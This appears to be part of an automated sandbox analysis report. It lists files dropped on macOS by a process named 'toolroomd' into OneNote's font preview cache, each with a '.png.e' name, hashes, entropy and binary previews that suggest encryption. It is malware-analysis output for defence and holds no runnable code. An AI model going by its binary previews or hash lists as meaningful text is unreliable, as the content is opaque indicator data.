Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..t..F..oJ.X...#..(.\.....#x".x.O...Hi......q."\|_.w[L..,x................#:3J.sSf>...p.....-BWz?$.G.W9....s...IW11PI..\|.+g.!...3N...Zj+......JQ..1O...).$..a...Y,B.Q...>GF..;].\|.%Y..V...fg...9E../....c66.TW.O....C..O.c3.<.Tr....Ms`.P.IN,.... .c....?@c..\|C~\..yak=....8.O.uu.8.tO...[....b/._..K@4.p..<u..3.Z...X...d..o.........(.....<aB.tM.QZ..c.\v..Ha..............E."-\.O9 Km.S.o....qN.AH$<..bM."~.....1L......K....y.....:.F'.m...X.K..p<A?.x>.Ws..q4In..n... .T..... ..oU.-.e.....Qc.7n@.??.8\.......UL..=.m.&.#.....E...>......L,.N..k.W../..K.7...0.U......5.+....n>.F.5.9...g...H,.o%.Y.+...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GungsuhCheRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	7.541056204960932
Encrypted:	false
SSDEEP:	48:E8FOdHjpihunn3fV3HJI5GKSz6OGP2GNpq:1OdHVq2vB6GzXFGu
MD5:	0EB7E21D7043DBC87518AFCDC21CF8DB
SHA1:	922F0AB9F4D4417B0937CA7EBB953408D91D02AD
SHA-256:	3112381D9489698A68632B11E57152D8BC5DF64E85F915A23D900B823E7F9225
SHA-512:	BE394C607AD1C06B4AAABB10323CAD14BEC37FA481FE6FE3BB8FD431EEB05D05EA9C66EBFD8BA2047539A99BB68605C06401F30C0344941D4AEF807C3C40B333
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aV....a.Rc..=.....^......!.i..fT..6.........3y6kD.W#...Ey.....'/.f......+..Qg8JZ..u..Gw.t.W.N.y:F.?.o.U.j....%..<....qP.#...............GF..E.A.9..-.B..."d..K...W..If....;......2.....l-.?.0S[.....EWT8...C..{...D.F.t[".vH0k..I....Ue...i...=...tX\|k...&.M...i..S.w.(..x9J`f.......}7Fe.... ..+./.y.P(...--...7.a.6.=./.ld............@^.T}.C."J.$....d..7/>....u......r..[.@.....q..FI.Z0}k.%.....!R....c/f...t0\|;....I/...r.....-..XBB..`.MX0.S.eZ.o..x....1x....%N.$vCO.d.O./....`..NJ....3.h..3..B..V.`.....n7...&6....b........(..Q.Yi.............M..x.O......9...3...Q..._....l;C.B.[8.QB......J..E.a._W..V@..g...P%.p.. *N\|...2.LBn...G.D....\|.!.wq.R...(GbH....9.~...8..P....l._g.a..4{.m..x..q..x...Z".......h.?HG..%..........b./=2...n`....CS3........b...9y...K..2.3..8.h.s\|....61...%t.2mX..(W3&A2......L.:B+h...8BK.>....g}..l.u.9.g.W..<@...g..E..s.D.U.-......k....6...u.....tT.op.n...701H....A..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GungsuhRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1378
Entropy (8bit):	7.4159483361213985
Encrypted:	false
SSDEEP:	24:EnBP1KInO+QTb+ZjYdFHs1olynVDM03gpugV68a2BHPDna8psePc0m7:Ex1zOLHycdFtlynVtg8gA8a2BvDa8pNw
MD5:	C944DE9CABEEDAC38FBC12A722D3554F
SHA1:	5D6B7593C96C0E5D239073271DE9D86E5ACBF60A
SHA-256:	D2E27AEC6FFB1E4969E9E211EE689B3EB3CE2C188674A121AF7942738AE58AA5
SHA-512:	7B2033B23E2E3F0C6A4051A9C0E80C6C1E2EB408DDDD783E200B9B44A2A072F1D5526D3246D5D7A9F596A3AE6C325A58F0C083A9980C6CBABD286EAACD90F380
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.W.............;x....N....^[...h..y]..k...~.."..<...G4x%...7..N..-.x.=..-......p..V.e...W....1...-.7....[F~...us......E..Q.?A........L....T..f.b.o.Z....M.}......\|.......yB...........?..6..<.k.3...gY`F.8.jFF?....p........}...........j.]..(.1{`...&..!.....<.....v..%.Uv.4Nj.k.36...avn...(f$PU......y..y.J...NE,.F...._.[..{...f.$..gu....6.l.'...L..K.o..f......:..P.:P.p...t.8..F...3.,....B.Q_.....P...)V5..U....VW..Feg...$..].a..Woc.......g..Y.:d...s.U.....j..&..K..X.l..... ..EQYlR%..jn..;3.2..E.g....<...^I...M@.\...r..n....%.w-.......i(N9..6..O.l.m.......k.w.L...JB}!.x..1...uV...s5.,.[..~ma....E2..5(.R.\|..........s.\|..(Up.r4..I..F.....'....= .>.t..!...h.;.j..........-.._&.m...f.3GP.B....:.....3..2..MI$...4...(t.U..^.....ZX^..S.X.o..6..S4J...d...~.C...~e..S.Z.....I..c+...(..-.t.@...IU.2~.....4..yV..H..;NR.tv..X_.X.2..!........d.V_9.b...4.U......8.\|.P`..r..E.r.Xf.Q...w.TO..5We...+....L.(T..8m

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gurmukhi MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	7.419508829092683
Encrypted:	false
SSDEEP:	24:EIhNtKV5FYWqfrSO5M1ToTUxeONbpcOuK6+ceX3pJ/E7atsePc0m7:EIZiYlzS4Mp4oLLcDKsE/E7atNpq
MD5:	CEEB9BE93929CD08EBFDE0C97975FC5F
SHA1:	B81BA5762122FC8FCD9CA3B46BE32E56C0400EFB
SHA-256:	E87BB80BD05AD206D7BFA9EC69CEB3B6FA3B9954F12A71E70D76E9F1D3E6E99E
SHA-512:	A7976A47CE711CEB250D3E4D8D04F966A1343813EBC6DCE09C47F360993F4597882AAA703B752ED63F82C4DF8D0EEBAFBC39507C7F7945238418844129FC7001
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.am...m...v2V..u..8o..!...e..2..@]..e4..d.i....f.d..7..Os.h..o..........Pgs2.E.g....(...........[Ow.kMW.2".s......Yj...._.@...`...3.QP.t...3=u....s..N..6...!.....1...%.y\.K.k.IA.B.....wek.u.%.S.K...^.-....+>.n...9N.8.6S%f.M. .o.'5..6+..a.r...\|......a..\|>..?!M..g..E.....j\..~.t.p...; Q.=.K..6...T)&.g .....'.v.3.....]Y. I.}..........v.Jsv.........7.J.]^{f...R'XT...+..DV_.1.`j.!~......R-j.-.........$B..X.........\|{...Ir..jk._...m.z..u.H...........{.......k...DJ.(..PKS..X..:..S.....0.T..F.^]l.v.-.....t4AQ..vH.q./..m..E..8.T..A#...CE..G..C..\.n..........B^~.Ki......#..!........9..9n..IMx=.4y.uW.2^..c..I.......W.CC..RC.c4V.56...Wx`.(.t.h....m.j....{...k...,.~A..c..........>....p&b3%.z..P.+c...l>h.D..c..Za.F.@ig.q..W.NE....y[Z4.y..Zn..cC..3...3..w*.....Z`......iE....f....9..cJ.6v....L.m%V\.........7.n.E..f.o.....(...X.....H.#.....ax.\.:~.....J+...W{..!8..74#4.!...g...B..S.?X^g...t..]..&

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gurmukhi MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	7.479812735606034
Encrypted:	false
SSDEEP:	24:Eqsrdv4opnM1CQsFsv74ImW+gG6JZo2CmilEM5s9NlAJbWg1N5caGsePc0m7:EdJ2CxFsvhFwWZBzNlAJbtGNpq
MD5:	1F6D22910BFA65C5894C4E86E666FDC4
SHA1:	65F0A3AA09C07FBBF4E03FAE44089369006AACD5
SHA-256:	9A28FCAC5D96908D46CC9E60809A887A5C13D4D634F3B2424E2CFBE38132670F
SHA-512:	D3B05B6929C64A22EFFE550DF15406C9FB7CEF4C16B4F7F41A64FF8AB8BDE22B9AE360EB5E2E3069B81A01C0CBF912E6DA8492E4764DB4404A88D1FDC64EBB85
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...}..fY..6.."%.hg.KF..A......+..?. .D..(.7G}E...Q...i..'i.A..#..&5q.$l3..T...3N.rs....\|zn....,[.....%.E........^...9.en5.%.V9...u...S....5..J.'t...Z#.'.....$..[..y}....M9k...o....!V...'{.h...2.....z5.E../.....ia.cs..g....z...`@.>.]n_.. .'8..i...e..Isy...(...B".\|s s8p.d........C.[2..v.....z.v...1....l0...Z.D....PD..].....lLv..5..g..i.Q......7.T.4....@1.8.f.$.u.5....tra..:.....\|S.j:.<H...jVF...X.\:..SK.$....@_C...l=....ng.L..nx:......L@.. H.w.).f.1.~..U.d...#..J.....V...}.I."`..........WS\q8.VA..$..L...Z.....nb.Wl..Z.9..a.zI.B..O+..vB........I15..i....O&.......k."..=.-0....+6..Z...j...M.bNmF..e../..g.Q ..@j...W.[..g. ...]V.....G..Ik..k....N.OMG...b1.. .)..'l..O....o.B.".&}..9...--.C..V..7......".(d...)u.,I..b.."FLGy...[@v-._..>....)u.(U...=."g.....5.....jk.<H.q..4=.A..-......1...<Y..R........%....d..E.N...Vn.$..S..{.Tma3..y3..y...u....m..-PT...y..~...7.\|........[..QqK..^./(..j.....K.:..0R..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gurmukhi Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2066
Entropy (8bit):	7.668549457961055
Encrypted:	false
SSDEEP:	48:Ec9ORKM62S+2IDkw/ak5LSKIEcGxt3IlNpq:L9/VVIDk6NL6BGL3ku
MD5:	DA8651240EA42D101959F11493A3B017
SHA1:	008781351BCB2BA60FEF15E20A86A81E61DB7898
SHA-256:	F1F18BA567E875E24EDCB7A614683C3471D539A843DEC8055652E42A93185408
SHA-512:	94BAE0E6258350E0F3EB9AB5BCB7281393FCE4CD7437B001DEDBF0108099F061C51BCDB15FB6D4367900DE1FCD512A1B79CBFFB46EFCEB702202ADD9995AB105
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...D7...+tWJ..V.l...d,0.jm..K...`.....f..b9Zh...Y....9..BO<..3?.GbZ.!....j..f ...w_.s......a.... .b.RX.^'PS.RX.^'PS.RX.^'PS...uC.ZAH.K.:...]'U..~bM../SX.M.._dw..1)....E%]_.\|.."............j}...^<.8....KSz......`....9...+.C.qs..c$q.H.....Dem[3m....V..i:O.?..x./..A.j.2.K......Q.%.%..d...... .gm0p]../z.......Y.9H.25p.1..=.6nG.D....I../...3>_..i...k.....r..8.R.']...Y.........sTo...B.G<.......#......?.a~"..]...(e....f5..........$.A...Y..B.....;..7.^p...%.R.2.H...\|+1.'..R=7....Tv..[I...........u.+....I....hPA...R..G..<.2..A#...F..\..Z.]j;.qJ.,.....K1..6...k.>(..4.C..s.Ji.::...........U...A..v ...~...O..<..../.Ie. .4......vJ./i.7.....Qn. .......6.U\.v..1..\..P..3..=....t.fK...n.9.Bn.p3.,...Q..?/?x....^b..% .o........b7P.7^..J.T.\|.LZ4....xX.~..E.........}Po.G..vH..,.92...........>,.s9v..{..I..(.6..x..g..`*t...S_...!5.......b.Q..n.3!\|t...d..D.i~#;...0.~...(9.>...d...y"...!..h.0..4.e%s..v,....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Heiti SCMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	7.3447271939112415
Encrypted:	false
SSDEEP:	24:EpN9k9BpEeiHG0RcyqBKi/3Z04w3or83WJMTvsePc0m7:Eq9BGHjRCBz/3OR3Q83sMTvNpq
MD5:	CB226D92148B4AB38591B5188275D0FC
SHA1:	087843980AF90ADF45DCD9A9CC2C53BC021FEE29
SHA-256:	010CD3DCEDB71A25D2AAB7D10561B180D2B514473E91E9BC944EA9B469C1F750
SHA-512:	ADD0C9D10CA5E192E4380BF229CD1002B19F8B55B6C62D4280D4D341C70A58730543024188EBD7CEDDC0566FD655E430E9068EB2BCB648EC70ABCE9917D0D5AE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a?../.......z.\.\..w#..=..w...5.._.1.A..)'.c.{,..~<..A,...6+.RF..f...'.A......%..2b3....d.(....w..<.+...Apc..7-l.nT.Z....N>..._.f.j.r.E..L..l..A.r.a.....rb..c...%H4.Dl.2....kM5..YR.<J.\|.PJ.A...e.<..5el....WV..s.H`a..$........5Uk.....O<.}.....z..=..D,...$..?...{^..^...@.X.^...=....?%..........:..B......bE...m.hf.....E .'1......Z....Ve..n.)..........t.T@.v.R...t&...F...Ig.5..<..9.\|...!........5z-......ID.....p #;W.(.BIf..... ..&..@.....vA....W......>.D..h~...^....Q~..H.y..UKg.2....i..F... .p.?..t..T..-~F.q..R.J[..qK...?....Q-B....I.Ge..O.Ae.\Y.W.s....X.t.f.uvJ./...#.H^\|.=....e >.....;.91..3..7.<;...=n.A..k.KTwP...'ZX.M...7.....^,.'y.z.;.O#_.R..D..#.V..g...1.).`..vH.Pd....B'...>l. ...gy."...5......d.f3...;..&.\|.F0.-....<...0..#=.6..S...Q@....gQ.P..F.,..a.Aq.H%0A.G.6 ....Rp.u>/.h.`;"..."....\|........U..u)y...>RU...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Heiti TCMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1138
Entropy (8bit):	7.289680940056414
Encrypted:	false
SSDEEP:	12:WvyOjwy+wyKpDW9ut1AMEK/jfrVzLqxZZ75H3WOSRDXae4WZeY7ssO01URt5cEPB:EMFkW9uScFqV3WxDQ7ub1mGsePc0m7
MD5:	9769F52349D02BD1EE741C4E10E3FFE5
SHA1:	E88CD7D9EEBD3A35E168A71B9CCBF4FDB65563A8
SHA-256:	24D0A0436D88BCF6BF387862D3A85B6E4FEC8094D5EDC1553F3B6A6AE87237F1
SHA-512:	03CD4DE681F082CDD002DC7D79AA02F92F3BB5F94AF26B524B8491FF8409252B32951C8B71CAB8717B9FEBB29D110F4113ADEE5E07E350F151C77A82AA183840
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aRc}...J...c.EN......bPl;\|...7=.%M.e.',s...@..:.l......L..l..2..g...['B......'N...6q...e.e..W.[y#.M.z.....7.....F..Q..9..[.......4..q..A.cI....Z..q..!......Y..[...+........X..s....K3.nl..}.#..1...,.........(.@...W...'.q......+O..._..G^....KD.....@.$..te..s..Q..}..M.o.......TI<....~)f..k.....W.J...y.b.S.u...q...r.3..JW..U"?.c..g..p......,......\o..v...l3vO..j....EE .(.4<l.c........k6....:.%..}.2..So#.=T.l.>..}.;z5d..y.O........\.8t.&."...(/..H...g..>....h.B.S."..Q..VJ5#E.R$..-.o../..."..CH.../...#&H5.h.;.g.j!.0I...Je...:.@...X3..n.<.'_=..k..4.z..C;.Ny...@........R.Z.5...,..8G..(...0...}9....n.K......>.z......eQ....} Q)...F.`........9&#x...).....13]..E.T....x..N6..H.H..+..O....L6.J+....m..7-l.nT.izBPWy......+W.J..E.d.......Z7.E\.:#=.6..S..A.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Helvetica NeueRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.491264449547965
Encrypted:	false
SSDEEP:	24:E0v5x9AkFnOqnBNZ1gfI3YjZ0KIkFQ6uwbEkudLLqFQi61O4nxVb3ri9ThsePc0q:E0vxOkvZ1EKMZ03kFQRwokudL9ikOqXJ
MD5:	1211681BE8FBB2B1FECE78D9621D5ECD
SHA1:	A01777B3B620724B605BF47CCA49738B23E46097
SHA-256:	665B6FC4E55C3EA44229756F53A4D878B658331C48F24CCF8FE1E89D6EF8D50E
SHA-512:	DB8CF5D042CDAD184896D06ADEA4DDC92CBEBD737F230C5CD9CF6780863581D4F97AC20C40F0A1D73DD74FBE620072AB0E4A410BC88F8DCDFAFA51EF0C920CE3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....C...k[..y$.5 A%......).j.M....W"..@m......VB.P3.....>?0...).P..........mmr+...._.^..s7...;.I..n0..M...I.u...Z.X.7....#...R'R..j.E.z~St..A.sqB.q4.EA.e..rU....u..]A.&V....f..1u..r@.(S1.q....P$k.....Y.W.t..xc.=..~...}.pC....@.....:B>q..Gi.a....X.&#l.......Z.(.` q..Sf.K3..H.C.].l9x.g.4:.'..T...Qk......d.,.....5.a...X...R..M..9.Y...$......>9.H...vC.....=..g.........}om...D..0.$..p8Q..ah......$....#O..e.3Y}...1IX.).....M.q...g;fTCHb.......d..yw}.1k.d.....,.a.....A/.E.).$....1..`..\|.^Z{......v.....H.mA.q./]...dI."..8.J0..c....]9R...}.Vc.{....D..<...A.h.....\|....g.H..?..]..i;..P..3...].Gfv_7......y.P...:.hf...$..+......h...#....DY.Q._../>I.Q...Il.@...h.......h.zS3$.'"..J.F.....5.z..ZH...Dg.f........C.=.Q.3iJ.j..3.VS......Z...U.~om\M.5....O..........*....%.EO".i....A:CP.'..f.=.5..j0_.....k..........?....r.....v.r-=..U".%.......79.&..T...['...+r.(;......w...;.~...E.Q.E...........m...<.V.%.'..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.HelveticaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1234
Entropy (8bit):	7.3813503285037525
Encrypted:	false
SSDEEP:	24:EjW5M9X8NRyASHBnpqtIncCBrgP9FoV22MOptDigPqxywRq1sePc0m7:EjWMRXp2AcW0LoXtfqzRq1Npq
MD5:	A5A36E9CB3385FCDF0D3B221916ED571
SHA1:	BC8561EEB75A38E99B90BD74F071E7E28C66278E
SHA-256:	D1F26A477169882E07EE5FCB826E95CB3F28F1E16EBF4BCD0F88ED1A9ADBF1B2
SHA-512:	5CFE81D817ECC7896146D00A13B258BA790F01DD4C05D1F85905BE0B6DF939213BF39C9DB5B4FC48B1FF0928A7920293C9860BDC357CB841552DD4ABB2BA160A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....q.....P&.~..].....(......n....>`w..4..\...or...f>.xz.q!'WM$8....X.....O...v.....{C..@.4.l......F..d'.rr.G...y...L.....PpA.j...5q.u.X.v.P.g..BZ...6A"3..(......=><...L:....,l.B..u..P.S.c&Yk....$...Y..e..).X.:..=.}.:...d.wGC..q..........S...8x?...3...>.b....Vf.S..R...........4#..`qe.......y.uD......n...~....i.....o.j-...r7.'.2.q.@.....e..{.z......S~Wu.^..G.(3+K.............%...=.X[.R\|........-ds.\(m+.w.....P.t..;........oI..z.?.@.......~...o..;.(.......`..^....l)....X...6......p!!.."q.C>A..O....J_)T.@1{81;..R.%w..v.[.._....#..K0......vv;..s@..K......(.......:F.\|.o\|.gN.q\.V..._i..g...t.Qm.a...39.Y&.d.4zz.....I....}.H-..~..?$.eg..3..\..J.......E..[......'.\|.O...:......$.!]......f-..8....<.....U...-.~.0.<..c>..)1.CKos.z......].^5.r.;.`q..(..%.....Z.....PD;7.V5..y.E....M.q..H........Ia..8.{..u>/.h.`H..3..t"......3..Kk"F_.&t...i/....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.HerculanumRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1874
Entropy (8bit):	7.613331481812113
Encrypted:	false
SSDEEP:	48:E27gE6L6LyuN4/LWm2gtAXa4aZOnw5yh+FlERfZPGtL8Npq:5gEizDWwd4SN5yAFlEdoCu
MD5:	C0594CE57832C2433E2299EA78D38867
SHA1:	711000D856EA892D48FEAB55C552A8E8E7201A42
SHA-256:	30FBDC7D18DAFC6885BF6F6F0C085BE14A0E7B81A7DCC01BAAB6C6D4E697E67C
SHA-512:	BA177AB813EE31D5104B3484F6B23E4D41D8909D94ED82AB47879FCFE64A564E626F96FB2DEF4DCE499FFA32B4977456F02644AD542C9889B8811052641D9718
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.."`..3v...n\.SyNII-6....-...T4.>B...`kY.....gP...zt]O......>0)E1svc>.T..Gx..9\|.....o=.t.1\|W%L.1G#.@ch._...Y....q...0...q...0...q...0..[.5 .s......GK......-CYN..>I.O..4E.....x.Z'..M...@TB>)..........F.^.rNN.$#..5.......R..q~!.3.C.R....$.#..._,Y.}{b...F.JJ^w..q..4$H....j...{.v>..Q.\|....Y.-......=..5U...q.r.]...j.......U\|.!xq@.r...X..D...Mn.6....Z.4jz7.....7.....Msm....J....oH...l.#l..mO.......%D..b.N.j.l.....G....Brp.;G.7%d.,S.(..J\....#ET....;{..j....iSs........~. MNm...Kb.G.O.Q..9..Y...B.D....UEc...:`..Z..l..S..D.v'.j..=....f.K..(..~S..].(\_...!X...G....i...-a.Wa!..q.W ..uK.?..BJ...P..b..%8...F.d...s....=......./X...!-...!.P.,..[gR.J!.A...E.K..L.h.CLP..\|V.6.. ...d..i.@(B....+"#..G..u.....#..E..C.VDFd.}...\.Y<e8:.o..............=..l.I.....#.<SUZ......])..+d.....GB2])....Cp..m.$.U...B@..M\|...,.E..z2.......U..:.2,.:.....L...'...s....;.....?".{...z..z'....z...^....Iy.0..G/X..y.&..k;.r..>kF..t.....Y.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Kaku Gothic ProNW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2426
Entropy (8bit):	7.714123754455447
Encrypted:	false
SSDEEP:	48:ET73NhE+fYFYV3hOT+a3JUke1A3GlZ71VsJKUb3h9Hp2J1QmJtNpq:S3NG+fLhOTRJwCowkUbLp2PQ4tu
MD5:	E5D72CA82F91F85F0BC6FBEAC31735A0
SHA1:	BF3B0DF55876194588EB4535EC6D95236A81CC13
SHA-256:	10318D7895DBB6DBE5F1DBFE9271FFAD2E1ECA89ED99BD974051DA8800C620FB
SHA-512:	6E37A6459F18D66C2DA0F029BAA88367A0743E16AB6A1F6DC13D4A7D10BE2FFF818C5DC9357F16AACDFE931C4EAC4D94A1A93FEFACAB725C424F6215AC81B0AA
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a%.'ief9y:........5...D^....,...E..n_..,.>G..6E=1..[..q.pd..@....dyU\.IFS>..D....g.jI....O......&q..V.Ecu w...%.s...w..x..N..g.m._$y\|..1..J..q........T../?.pdG.R. WR=........C.d...1_%l.Q..ZVf!/...A.{Q....,..f._...77O.Ds(... ._/..Q...`.p.O...0.[......(..Loc.{+.....0g7.G.....5.~..e#.E.1....o....q..7.......Z...s..........4...k]TA..%w ..l.=.Z...?..j;,.kA'v}S(:c_..........Lt...f.9..Z.?E..\|2M....F..MG..!...f..D.D...Fj....;.{....O.u..\|...'w'k$..~...Cm%..1m.......`...B._._.n..m.......v&L..\.n*FD...M.).(...8xLJ..)Zk..X.i.8q.Z32..1.?.=...9X...{\..].(xV$..A.T}.PR.(o.+.."..}D.'.a.F.m.....[..1.].j....`Q8..E...t..g`q.M$.......W.1...rH..p...'=..@.B.......N.,.Hp./..t..7@>.w..1...h.,..` ...Z...d.RBXh....A...p...R.."-T._C...p.h".b.../.Gc.eX..H..m)S.tJT....s#.5......>~.]..~....F.n.....R/.......J.l~VJz.p..D...n'6.(R.^...(...bT.~DL......@i[JI..OL.&... ......")=....^....H..T;w..^l..$......!.......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Kaku Gothic ProW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2298
Entropy (8bit):	7.707270419932631
Encrypted:	false
SSDEEP:	48:Es7et+LmVu6PKhp1oVGVm3dUe9cFNFr+ifrOSXi6Dv1g6gNpq:17Q+yuqkQG03dUe9cNTDsmvi6gu
MD5:	3835A43084CEAC5784FA320873721436
SHA1:	A380C2CCB63132688FB030909D0814E588E168F5
SHA-256:	BB7D3FDD407C1C99DF7FF739A1379981E39CF2447433D764EAF4A10D5B0157D2
SHA-512:	C0C63B1A31C57404C39005505C994BD381483C67B85850590DF5215936F89471B71609A0ACEAADEFF0FC2FCD592805BEE935F9093CF3278A33869358C57C5253
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a^.....>8.Ja.....M....Q..N......3g`...eE........M8..d..S#...t..n..P.A.)...iu.c.Y..5..k.....o>....z..:.++.V[.7.k..m @..en.0.6Gn..f..U...:..K..~x...8$.........4".Q..I...?.K$..]....Z.!..].4.....x.#.7#4.......y..../..[E..?..\|&Wf....jc.Y..$...l...}Z.(W7.....:y>!....C.u...Af}V......~3,...Leu(...]I.1M.t.s.?.[tH....!......J$PQM..B.BO..F.....P.....Ye^.....b...NmMg..1.u........s#..._\....T.epp...F......6..qZl%...>.$A.)....7C......2.v..K.....v.S....f.P......\.=l..4..*.TY.(@.j.T%m.h.li..)....h.sx....4w.c.fZg,+....]`..\|@.,..r.+.N..."...C\t}...'..T..6;....0..<..=M.=.....&.._E.x.+6so.....B......~..~P..tX.$lw..t...oQ..+...]...=.Y9...Z..X.#..iC...:.?e...6.L....r.f_..B......E.....t....L...!7......\|q\..I...v.....'.7.39Q.&.t..sd..b...D/$.8u>.KW....Q&&;.i.^b..m\..;...@..........G..<L...m.2N..07\|.u.e.&O[.g..o..m>L..m....1(..j..B..f_c...FeRH..Z.#...&...G....m.......5"OH......m...\|...D..(......Z.g...qL....E......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Kaku Gothic StdNW8.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2994
Entropy (8bit):	7.790432111601031
Encrypted:	false
SSDEEP:	48:9pazsYMCqEPMQcVf/gq5u/VHYyP/OMKIL4sUMqYYhNdSM+Npq:9+LMzBxVf/gq5CNYmx4s9CdSM+u
MD5:	57C8E74DE1954741CD60CC9E565C6AEC
SHA1:	C0669962D1EE2C622CA959A759747C7FD40D69E6
SHA-256:	B25D7BE97F9305AE17F69490999A4E65C78F5F5095115673A89B525C95F42DF7
SHA-512:	237D1EE094BC4F02D309597E0EF7F06504DE3C8F7AB787C7AD6AB9ACF431C65EBE9F5F843618F378AAEEF48486D9085D19DA4044572F2C748E09102990552955
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a.B.<....z{....j.....t.../nD.....[t....+........I.a.6`..3..2.Ew&...[\.q9ck.....F...3..KsG..i..Gx.f.....h.\|.._......c..z......`..^.F.6/.L...z.3..C>[...d...G.K.5...6.`.{..qQR..e.r...:....t,...&.u.o.....&..5.\|'....BL....;>tW:vi.B..b^....ZC..`b."7V...:...h.. .U.....m...s!.(.8....uO.....#./....i.t..q.....s`.Z..9.5.Xs.V.f.".n'.0+~$.D.Q!.t.J.h..B.<.eO....]O.....an....?.k........;...~.X/..@..V..%?[.$.......;.".y...!.".......-...{..cX.Iy...G.@....<....f..l.<]....nN<..]=....ns.\\O){.0........$:..(F..Wm.h.2k..H3.9..F..R.v$:../.A.).Mi\|.[.......i.@.[.....%..gd..$w)...K....}WFG..a1CSz..e.. ....y7......q/.X.....H......J.....w.Ab. .p_Q.B@..r%.g.B..........u,.....vS.c..C...>.X.00.k..qF..!..k.G]e.....w...H.g@.b..5..s.t...!...D.<.<T...tj..~.;.!.v.....w...."..&........;..&y@r.}c k..g.;.$...;...rR...?#....).BV`.....c..({:....!.:7..{...w..E....w8.~...0..s.\.a.I}3....=[OFd...N.^.\.>......9qHJv%.h!W...R......t.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Kaku Gothic StdW8.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2818
Entropy (8bit):	7.772799972078469
Encrypted:	false
SSDEEP:	48:9IqZmXgVWFDJhXDIGip8X3fW8ZcnIZqJoWTCDKAJK4+SeRNpq:9IYmHpJlCyf1ZcIZElTCdx+3Ru
MD5:	A1F1AEC449B7A516EF560ED387E67680
